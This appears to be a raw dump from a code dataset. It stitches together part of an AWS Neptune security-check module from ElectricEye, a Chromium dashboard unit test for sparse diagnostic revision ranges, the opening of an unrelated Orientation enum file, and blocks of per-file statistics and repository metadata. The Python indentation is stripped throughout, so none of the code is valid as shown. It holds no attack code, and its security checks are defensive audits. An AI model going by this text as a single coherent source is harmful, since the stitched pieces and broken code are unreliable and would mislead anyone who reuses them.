"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Neptune.4] Neptune cluster parameter groups should enforce SSL connections to Neptune databases",
"Description": "Neptune cluster parameter group "
+ parameterGroupName
+ " enforces SSL connections.",
"Remediation": {
"Recommendation": {
"Text": "For more information on enforcing SSL/HTTPS connections to Neptune instances refer to the Encryption in Transit: Connecting to Neptune Using SSL/HTTPS section of the Amazon Neptune User Guide.",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/security-ssl.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneParameterGroup",
"Id": parameterGroupArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"ParameterGroupName": parameterGroupName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
pass
@registry.register_check("neptune")
def neptune_cluster_parameter_audit_log_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Neptune.5] Neptune cluster parameter groups should enforce audit logging for Neptune databases"""
response = neptune.describe_db_cluster_parameter_groups()
for parametergroup in response["DBClusterParameterGroups"]:
parameterGroupName = str(parametergroup["DBClusterParameterGroupName"])
parameterGroupArn = str(parametergroup["DBClusterParameterGroupArn"])
response = neptune.describe_db_cluster_parameters(
DBClusterParameterGroupName=parameterGroupName
)
for parameters in response["Parameters"]:
if str(parameters["ParameterName"]) == "neptune_enable_audit_log":
auditLogCheck = str(parameters["ParameterValue"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if auditLogCheck == "0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": parameterGroupArn
+ "/neptune-cluster-param-group-audit-logging-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": parameterGroupArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[Neptune.5] Neptune cluster parameter groups should enforce audit logging for Neptune databases",
"Description": "Neptune cluster parameter group "
+ parameterGroupName
+ " does not enforce audit logging. Refer to the remediation instructions to remediate this behavior",
"Remediation": {
"Recommendation": {
"Text": "For more information on audit logging for Neptune instances refer to the Enabling Neptune Audit Logs section of the Amazon Neptune User Guide.",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/auditing.html#auditing-enable",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneParameterGroup",
"Id": parameterGroupArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"ParameterGroupName": parameterGroupName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF DE.AE-3",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 CA-7",
"NIST SP 800-53 IR-4",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-8",
"NIST SP 800-53 SI-4",
"AICPA TSC CC7.2",
"ISO 27001:2013 A.12.4.1",
"ISO 27001:2013 A.16.1.7",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": parameterGroupArn
+ "/neptune-cluster-param-group-audit-logging-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": parameterGroupArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Neptune.5] Neptune cluster parameter groups should enforce audit logging for Neptune databases",
"Description": "Neptune cluster parameter group "
+ parameterGroupName
+ " enforces audit logging.",
"Remediation": {
"Recommendation": {
"Text": "For more information on audit logging for Neptune instances refer to the Enabling Neptune Audit Logs section of the Amazon Neptune User Guide.",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/auditing.html#auditing-enable",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneParameterGroup",
"Id": parameterGroupArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"ParameterGroupName": parameterGroupName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF DE.AE-3",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 CA-7",
"NIST SP 800-53 IR-4",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-8",
"NIST SP 800-53 SI-4",
"AICPA TSC CC7.2",
"ISO 27001:2013 A.12.4.1",
"ISO 27001:2013 A.16.1.7",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
pass
| 52.821101
| 235
| 0.471443
| 2,705
| 34,545
| 5.995194
| 0.116821
| 0.021459
| 0.032188
| 0.039341
| 0.90399
| 0.902941
| 0.902941
| 0.899673
| 0.894
| 0.884319
| 0
| 0.053244
| 0.42805
| 34,545
| 654
| 236
| 52.821101
| 0.767537
| 0.03714
| 0
| 0.828756
| 0
| 0.033926
| 0.381487
| 0.049699
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009693
| false
| 0.011309
| 0.004847
| 0
| 0.017771
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
221e7d5ca31f5875d5f9f621df32b4e91a43d552
| 26,363
|
py
|
Python
|
dashboard/dashboard/models/histogram_test.py
|
PLSV/catapult
|
88e5b1f40c89c4b80d3dd56a722936d07f222a55
|
[
"BSD-3-Clause"
] | null | null | null |
dashboard/dashboard/models/histogram_test.py
|
PLSV/catapult
|
88e5b1f40c89c4b80d3dd56a722936d07f222a55
|
[
"BSD-3-Clause"
] | null | null | null |
dashboard/dashboard/models/histogram_test.py
|
PLSV/catapult
|
88e5b1f40c89c4b80d3dd56a722936d07f222a55
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import json
import sys
from dashboard.common import testing_common
from dashboard.common import utils
from dashboard.models import histogram
from tracing.value.diagnostics import generic_set
from tracing.value.diagnostics import reserved_infos
class SparseDiagnosticTest(testing_common.TestCase):
"""Test case for functions in SparseDiagnostic."""
def setUp(self):
super(SparseDiagnosticTest, self).setUp()
self.SetCurrentUser('foo@bar.com', is_admin=True)
def _AddMockData(self, test_key):
data_samples = {
'owners': [
{
'type': 'GenericSet',
'guid': '1',
'values': ['1']
},
{
'type': 'GenericSet',
'guid': '1',
'values': ['2']
},
{
'type': 'GenericSet',
'guid': '1',
'values': ['3']
},
],
'bugs': [
{
'type': 'GenericSet',
'guid': '1',
'values': ['a']
},
{
'type': 'GenericSet',
'guid': '1',
'values': ['b']
},
{
'type': 'GenericSet',
'guid': '1',
'values': ['c']
},
]
}
for k, diagnostic_samples in data_samples.items():
for i, sample in enumerate(diagnostic_samples):
start_revision = i * 10
end_revision = (i + 1) * 10 - 1
if i == len(diagnostic_samples) - 1:
end_revision = sys.maxsize
e = histogram.SparseDiagnostic(
data=sample,
test=test_key,
start_revision=start_revision,
end_revision=end_revision,
name=k,
internal_only=False)
e.put()
def testFixupDiagnostics_Middle_FixesRange(self):
test_key = utils.TestKey('Chromium/win7/foo')
self._AddMockData(test_key)
data = {'type': 'GenericSet', 'guid': '1', 'values': ['10']}
e = histogram.SparseDiagnostic(
data=data,
test=test_key,
start_revision=5,
end_revision=sys.maxsize,
name='owners',
internal_only=False)
e.put()
histogram.SparseDiagnostic.FixDiagnostics(test_key).get_result()
expected = {
'owners': [(0, 4), (5, 9), (10, 19), (20, sys.maxsize)],
'bugs': [(0, 9), (10, 19), (20, sys.maxsize)],
}
diags = histogram.SparseDiagnostic.query().fetch()
for d in diags:
self.assertIn((d.start_revision, d.end_revision), expected[d.name])
expected[d.name].remove((d.start_revision, d.end_revision))
self.assertEqual(0, len(expected['owners']))
self.assertEqual(0, len(expected['bugs']))
def testFixupDiagnostics_End_FixesRange(self):
test_key = utils.TestKey('Chromium/win7/foo')
self._AddMockData(test_key)
data = {'type': 'GenericSet', 'guid': '1', 'values': ['10']}
e = histogram.SparseDiagnostic(
data=data,
test=test_key,
start_revision=100,
end_revision=sys.maxsize,
name='owners',
internal_only=False)
e.put()
histogram.SparseDiagnostic.FixDiagnostics(test_key).get_result()
expected = {
'owners': [(0, 9), (10, 19), (20, 99), (100, sys.maxsize)],
'bugs': [(0, 9), (10, 19), (20, sys.maxsize)],
}
diags = histogram.SparseDiagnostic.query().fetch()
for d in diags:
self.assertIn((d.start_revision, d.end_revision), expected[d.name])
expected[d.name].remove((d.start_revision, d.end_revision))
self.assertEqual(0, len(expected['owners']))
self.assertEqual(0, len(expected['bugs']))
def testFixupDiagnostics_DifferentTestPath_NoChange(self):
test_key1 = utils.TestKey('Chromium/win7/1')
test_key2 = utils.TestKey('Chromium/win7/2')
self._AddMockData(test_key1)
self._AddMockData(test_key2)
data = {'type': 'GenericSet', 'guid': '1', 'values': ['10']}
e = histogram.SparseDiagnostic(
data=data,
test=test_key1,
start_revision=5,
end_revision=sys.maxsize,
name='owners',
internal_only=False)
e.put()
histogram.SparseDiagnostic.FixDiagnostics(test_key2).get_result()
expected = {
'owners': [(0, 9), (10, 19), (20, sys.maxsize)],
'bugs': [(0, 9), (10, 19), (20, sys.maxsize)],
}
diags = histogram.SparseDiagnostic.query(
histogram.SparseDiagnostic.test == test_key2).fetch()
for d in diags:
self.assertIn((d.start_revision, d.end_revision), expected[d.name])
expected[d.name].remove((d.start_revision, d.end_revision))
self.assertEqual(0, len(expected['owners']))
self.assertEqual(0, len(expected['bugs']))
def testFixupDiagnostics_NotUnique_NoChange(self):
test_key = utils.TestKey('Chromium/win7/foo')
self._AddMockData(test_key)
data = {'type': 'GenericSet', 'guid': '1', 'values': ['1']}
e = histogram.SparseDiagnostic(
data=data,
test=test_key,
start_revision=5,
end_revision=sys.maxsize,
name='owners',
internal_only=False)
e.put()
histogram.SparseDiagnostic.FixDiagnostics(test_key).get_result()
expected = {
'owners': [(0, 9), (10, 19), (20, sys.maxsize)],
'bugs': [(0, 9), (10, 19), (20, sys.maxsize)],
}
diags = histogram.SparseDiagnostic.query(
histogram.SparseDiagnostic.test == test_key).fetch()
for d in diags:
self.assertIn((d.start_revision, d.end_revision), expected[d.name])
expected[d.name].remove((d.start_revision, d.end_revision))
self.assertEqual(0, len(expected['owners']))
self.assertEqual(0, len(expected['bugs']))
def testGetMostRecentDataByNames_ReturnAllData(self):
data_samples = [{
'type': 'GenericSet',
'guid': 'eb212e80-db58-4cbd-b331-c2245ecbb826',
'values': ['alice@chromium.org']
}, {
'type': 'GenericSet',
'guid': 'eb212e80-db58-4cbd-b331-c2245ecbb827',
'values': ['abc']
}]
test_key = utils.TestKey('Chromium/win7/foo')
entity = histogram.SparseDiagnostic(
data=data_samples[0],
test=test_key,
start_revision=1,
end_revision=sys.maxsize,
id=data_samples[0]['guid'],
name=reserved_infos.OWNERS.name)
entity.put()
entity = histogram.SparseDiagnostic(
data=data_samples[1],
test=test_key,
start_revision=1,
end_revision=sys.maxsize,
id=data_samples[1]['guid'],
name=reserved_infos.BUG_COMPONENTS.name)
entity.put()
lookup_result = histogram.SparseDiagnostic.GetMostRecentDataByNamesSync(
test_key,
set([reserved_infos.OWNERS.name, reserved_infos.BUG_COMPONENTS.name]))
self.assertEqual(
lookup_result.get(reserved_infos.OWNERS.name).get('values'),
['alice@chromium.org'])
self.assertEqual(
lookup_result.get(reserved_infos.BUG_COMPONENTS.name).get('values'),
['abc'])
def testGetMostRecentDataByNames_ReturnsNoneIfNoneFound(self):
data_sample = {
'type': 'GenericSet',
'guid': 'eb212e80-db58-4cbd-b331-c2245ecbb826',
'values': ['alice@chromium.org']
}
test_key = utils.TestKey('Chromium/win7/foo')
entity = histogram.SparseDiagnostic(
data=data_sample,
test=test_key,
start_revision=1,
end_revision=sys.maxsize,
id=data_sample['guid'],
name=reserved_infos.OWNERS.name)
entity.put()
lookup_result = histogram.SparseDiagnostic.GetMostRecentDataByNamesSync(
test_key,
set([reserved_infos.OWNERS.name, reserved_infos.BUG_COMPONENTS.name]))
self.assertEqual(
lookup_result.get(reserved_infos.OWNERS.name).get('values'),
['alice@chromium.org'])
self.assertIsNone(lookup_result.get(reserved_infos.BUG_COMPONENTS.name))
def testGetMostRecentDataByNames_ReturnsNoneIfNoName(self):
data_sample = {'guid': 'abc', 'osName': 'linux', 'type': 'DeviceInfo'}
test_key = utils.TestKey('Chromium/win7/foo')
entity = histogram.SparseDiagnostic(
data=json.dumps(data_sample),
test=test_key,
start_revision=1,
end_revision=sys.maxsize,
id=data_sample['guid'])
entity.put()
lookup_result = histogram.SparseDiagnostic.GetMostRecentDataByNamesSync(
test_key,
set([reserved_infos.OWNERS.name, reserved_infos.BUG_COMPONENTS.name]))
self.assertIsNone(lookup_result.get(reserved_infos.OWNERS.name))
self.assertIsNone(lookup_result.get(reserved_infos.BUG_COMPONENTS.name))
def testGetMostRecentDataByNames_ToleratesDuplicateName(self):
data_samples = [{
'type': 'GenericSet',
'guid': 'eb212e80-db58-4cbd-b331-c2245ecbb826',
'values': ['alice@chromium.org']
}, {
'type': 'GenericSet',
'guid': 'eb212e80-db58-4cbd-b331-c2245ecbb827',
'values': ['bob@chromium.org']
}]
test_key = utils.TestKey('Chromium/win7/foo')
entity = histogram.SparseDiagnostic(
data=data_samples[0],
test=test_key,
start_revision=1,
end_revision=sys.maxsize,
id=data_samples[0]['guid'],
name=reserved_infos.OWNERS.name)
entity.put()
entity = histogram.SparseDiagnostic(
data=data_samples[1],
test=test_key,
start_revision=2,
end_revision=sys.maxsize,
id=data_samples[1]['guid'],
name=reserved_infos.OWNERS.name)
entity.put()
# TODO(crbug.com/877809): assertRaises
lookup_result = histogram.SparseDiagnostic.GetMostRecentDataByNamesSync(
test_key, set([reserved_infos.OWNERS.name]))
self.assertEqual(
lookup_result.get(reserved_infos.OWNERS.name).get('values'),
data_samples[1]['values'])
def _CreateGenericDiagnostic(self,
name,
values,
test_key,
start_revision,
end_revision=sys.maxsize):
d = generic_set.GenericSet([values])
e = histogram.SparseDiagnostic(
id=d.guid,
data=d.AsDict(),
name=name,
test=test_key,
start_revision=start_revision,
end_revision=end_revision)
return e
def _AddGenericDiagnostic(self,
name,
values,
test_key,
start_revision,
end_revision=sys.maxsize):
e = self._CreateGenericDiagnostic(name, values, test_key, start_revision,
end_revision)
ek = e.put()
suite_key = utils.TestKey('/'.join(test_key.id().split('/')[:3]))
histogram.HistogramRevisionRecord.GetOrCreate(suite_key,
start_revision).put()
histogram.SparseDiagnostic.FixDiagnostics(test_key).get_result()
return ek
def _CheckExpectations(self, diagnostic, guid_mapping, expected):
q = histogram.SparseDiagnostic.query()
q = q.order(histogram.SparseDiagnostic.end_revision)
sparse = q.fetch()
# Check that the mapping is correct, in that if there is one it should point
# to a diagnostic with a valid range and same data.
sparse_by_guid = dict((s.key.id(), s) for s in sparse)
if guid_mapping:
mapped_diagnostic = guid_mapping[diagnostic.key.id()]
existing_diagnostic = sparse_by_guid[mapped_diagnostic['guid']]
self.assertFalse(existing_diagnostic.IsDifferent(diagnostic))
# We check that the start position is within the range, but not the end
# since the end is set to sys.maxint and gets capped during insertion.
self.assertTrue(
existing_diagnostic.start_revision <= diagnostic.start_revision)
self.assertTrue(
existing_diagnostic.end_revision >= diagnostic.start_revision)
for d in sparse:
if not isinstance(d.data, dict):
continue
self.assertIn((d.start_revision, d.end_revision, d.data['values']),
expected)
expected.remove((d.start_revision, d.end_revision, d.data['values']))
self.assertFalse(expected)
def testFindOrInsertDiagnostics_Latest_Same(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
e = self._CreateGenericDiagnostic('foo', 'm1', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics(
[e], test_key, e.start_revision, e.start_revision).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_Latest_Different(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics(
[e], test_key, e.start_revision, e.start_revision).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 9, [u'm1']),
(10, sys.maxsize, [u'm2']),
])
def testFindOrInsertDiagnostics_Latest_Invalid(self):
test_key = utils.TestKey('M/B/S')
invalid = self._AddGenericDiagnostic('foo', 'm1', test_key, 1).get()
invalid.data = '{'
invalid.put()
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics(
[e], test_key, e.start_revision, e.start_revision).get_result())
self._CheckExpectations(e, guid_mapping, [
(10, sys.maxsize, [u'm2']),
])
def testFindOrInsertDiagnostics_Latest_New(self):
test_key = utils.TestKey('M/B/S')
e = self._CreateGenericDiagnostic('foo', 'm1', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics(
[e], test_key, e.start_revision, e.start_revision).get_result())
self._CheckExpectations(e, guid_mapping, [
(10, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Same(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm1', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm1', test_key, 5)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Before_Same(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 5)
self._AddGenericDiagnostic('foo', 'm1', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm1', test_key, 1)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Before_Diff(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 5)
self._AddGenericDiagnostic('foo', 'm1', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 1)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 4, [u'm2']),
(5, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Splits_CurSame_NextDiff(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm1', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 5)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 4, [u'm1']),
(5, 9, [u'm2']),
(10, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Splits_CurDiff_NextNone(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm1', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 12)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 11, [u'm1']),
(12, sys.maxsize, [u'm2']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Splits_CurDiff_NextNone_Rev(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm1', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 8)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 7, [u'm1']),
(8, 9, [u'm2']),
(10, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Splits_CurDiff_HasRevs(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm1', test_key, 8)
self._AddGenericDiagnostic('foo', 'm2', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 5)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 4, [u'm1']),
(5, 7, [u'm2']),
(8, 9, [u'm1']),
(10, sys.maxsize, [u'm2']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Splits_CurDiff_NextDiff(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm3', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 5)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 4, [u'm1']),
(5, 9, [u'm2']),
(10, sys.maxsize, [u'm3']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Splits_CurDiff_NextSame(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm3', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm3', test_key, 5)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 4, [u'm1']),
(5, sys.maxsize, [u'm3']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_NoNext_NoRevs(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm3', test_key, 10)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
10).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 9, [u'm1']),
(10, sys.maxsize, [u'm2']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_NoNext_Revs(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm3', test_key, 10)
self._AddGenericDiagnostic('foo', 'm3', test_key, 15)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
15).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 9, [u'm1']),
(10, 14, [u'm2']),
(15, sys.maxsize, [u'm3']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_Next_Revs(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm3', test_key, 10)
self._AddGenericDiagnostic('foo', 'm3', test_key, 13)
self._AddGenericDiagnostic('foo', 'm4', test_key, 15)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
15).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 9, [u'm1']),
(10, 12, [u'm2']),
(13, 14, [u'm3']),
(15, sys.maxsize, [u'm4']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_Next_Revs_Same(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm3', test_key, 10)
self._AddGenericDiagnostic('foo', 'm2', test_key, 15)
e = self._CreateGenericDiagnostic('foo', 'm2', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
15).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 9, [u'm1']),
(10, sys.maxsize, [u'm2']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_Next_NoRevs_Diff(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm2', test_key, 10)
self._AddGenericDiagnostic('foo', 'm3', test_key, 15)
e = self._CreateGenericDiagnostic('foo', 'm4', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
15).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 9, [u'm1']),
(10, 14, [u'm4']),
(15, sys.maxsize, [u'm3']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_Next_NoRevs_Same(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm2', test_key, 10)
self._AddGenericDiagnostic('foo', 'm3', test_key, 15)
e = self._CreateGenericDiagnostic('foo', 'm3', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
15).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 9, [u'm1']),
(10, sys.maxsize, [u'm3']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_Next_Prev_Same(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm2', test_key, 10)
self._AddGenericDiagnostic('foo', 'm1', test_key, 15)
e = self._CreateGenericDiagnostic('foo', 'm1', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
15).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, sys.maxsize, [u'm1']),
])
def testFindOrInsertDiagnostics_OutOfOrder_Clobber_NextDiff_PrevSame(self):
test_key = utils.TestKey('M/B/S')
self._AddGenericDiagnostic('foo', 'm1', test_key, 1)
self._AddGenericDiagnostic('foo', 'm2', test_key, 10)
self._AddGenericDiagnostic('foo', 'm3', test_key, 15)
e = self._CreateGenericDiagnostic('foo', 'm1', test_key, 10)
guid_mapping = (
histogram.SparseDiagnostic.FindOrInsertDiagnostics([e], test_key,
e.start_revision,
15).get_result())
self._CheckExpectations(e, guid_mapping, [
(1, 14, [u'm1']),
(15, sys.maxsize, [u'm3']),
])
| 35.386577
| 80
| 0.58859
| 2,762
| 26,363
| 5.403331
| 0.08798
| 0.067542
| 0.083222
| 0.027339
| 0.832552
| 0.814058
| 0.80528
| 0.798378
| 0.762128
| 0.748325
| 0
| 0.031122
| 0.279672
| 26,363
| 744
| 81
| 35.43414
| 0.754766
| 0.019042
| 0
| 0.708263
| 0
| 0
| 0.061281
| 0.006964
| 0
| 0
| 0
| 0.001344
| 0.040472
| 1
| 0.057336
| false
| 0
| 0.016863
| 0
| 0.079258
| 0.001686
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
97ea9d82229730c7fd27be65e43b73c230b02244
| 14,398
|
py
|
Python
|
2012/AC_Rob.py
|
Valchris/IEEEXtreme_WorkingAsIntended
|
c3e04633ce6d9c1a1582081767e8f2090adffa28
|
[
"MIT"
] | null | null | null |
2012/AC_Rob.py
|
Valchris/IEEEXtreme_WorkingAsIntended
|
c3e04633ce6d9c1a1582081767e8f2090adffa28
|
[
"MIT"
] | null | null | null |
2012/AC_Rob.py
|
Valchris/IEEEXtreme_WorkingAsIntended
|
c3e04633ce6d9c1a1582081767e8f2090adffa28
|
[
"MIT"
] | null | null | null |
class Orientation(object):
UP=0
LEFT=1
FRONT=2
RIGHT=3
BACK=4
